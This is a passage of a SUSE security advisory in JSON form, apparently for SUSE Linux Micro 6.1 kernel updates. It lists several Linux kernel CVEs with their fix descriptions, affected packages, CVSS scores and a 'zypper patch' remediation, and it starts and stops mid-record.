net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68230",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68230"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix gpu page fault after hibernation on PF passthrough\n\nOn PF passthrough environment, after hibernate and then resume, coralgemm\nwill cause gpu page fault.\n\nMode1 reset happens during hibernate, but partition mode is not restored\non resume, register mmCP_HYP_XCP_CTL and mmCP_PSP_XCP_CTL is not right\nafter resume. When CP access the MQD BO, wrong stride size is used,\nthis will cause out of bound access on the MQD BO, resulting page fault.\n\nThe fix is to ensure gfx_v9_4_3_switch_compute_partition() is called\nwhen resume from a hibernation.\nKFD resume is called separately during a reset recovery or resume from\nsuspend sequence. Hence it\u0027s not required to be called as part of\npartition switch.\n\n(cherry picked from commit 5d1b32cfe4a676fe552416cb5ae847b215463a1a)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68230",
"url": "https://www.suse.com/security/cve/CVE-2025-68230"
},
{
"category": "external",
"summary": "SUSE Bug 1255134 for CVE-2025-68230",
"url": "https://bugzilla.suse.com/1255134"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68230"
},
{
"cve": "CVE-2025-68233",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68233"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: Add call to put_pid()\n\nAdd a call to put_pid() corresponding to get_task_pid().\nhost1x_memory_context_alloc() does not take ownership of the PID so we\nneed to free it here to avoid leaking.\n\n[mperttunen@nvidia.com: reword commit message]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68233",
"url": "https://www.suse.com/security/cve/CVE-2025-68233"
},
{
"category": "external",
"summary": "SUSE Bug 1255206 for CVE-2025-68233",
"url": "https://bugzilla.suse.com/1255206"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68233"
},
{
"cve": "CVE-2025-68235",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68235"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnouveau/firmware: Add missing kfree() of nvkm_falcon_fw::boot\n\nnvkm_falcon_fw::boot is allocated, but no one frees it. This causes a\nkmemleak warning.\n\nMake sure this data is deallocated.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68235",
"url": "https://www.suse.com/security/cve/CVE-2025-68235"
},
{
"category": "external",
"summary": "SUSE Bug 1255209 for CVE-2025-68235",
"url": "https://bugzilla.suse.com/1255209"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68235"
},
{
"cve": "CVE-2025-68237",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68237"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtdchar: fix integer overflow in read/write ioctls\n\nThe \"req.start\" and \"req.len\" variables are u64 values that come from the\nuser at the start of the function. We mask away the high 32 bits of\n\"req.len\" so that\u0027s capped at U32_MAX but the \"req.start\" variable can go\nup to U64_MAX which means that the addition can still integer overflow.\n\nUse check_add_overflow() to fix this bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68237",
"url": "https://www.suse.com/security/cve/CVE-2025-68237"
},
{
"category": "external",
"summary": "SUSE Bug 1255203 for CVE-2025-68237",
"url": "https://bugzilla.suse.com/1255203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68237"
},
{
"cve": "CVE-2025-68238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: rawnand: cadence: fix DMA device NULL pointer dereference\n\nThe DMA device pointer `dma_dev` was being dereferenced before ensuring\nthat `cdns_ctrl-\u003edmac` is properly initialized.\n\nMove the assignment of `dma_dev` after successfully acquiring the DMA\nchannel to ensure the pointer is valid before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68238",
"url": "https://www.suse.com/security/cve/CVE-2025-68238"
},
{
"category": "external",
"summary": "SUSE Bug 1255202 for CVE-2025-68238",
"url": "https://bugzilla.suse.com/1255202"
}
],
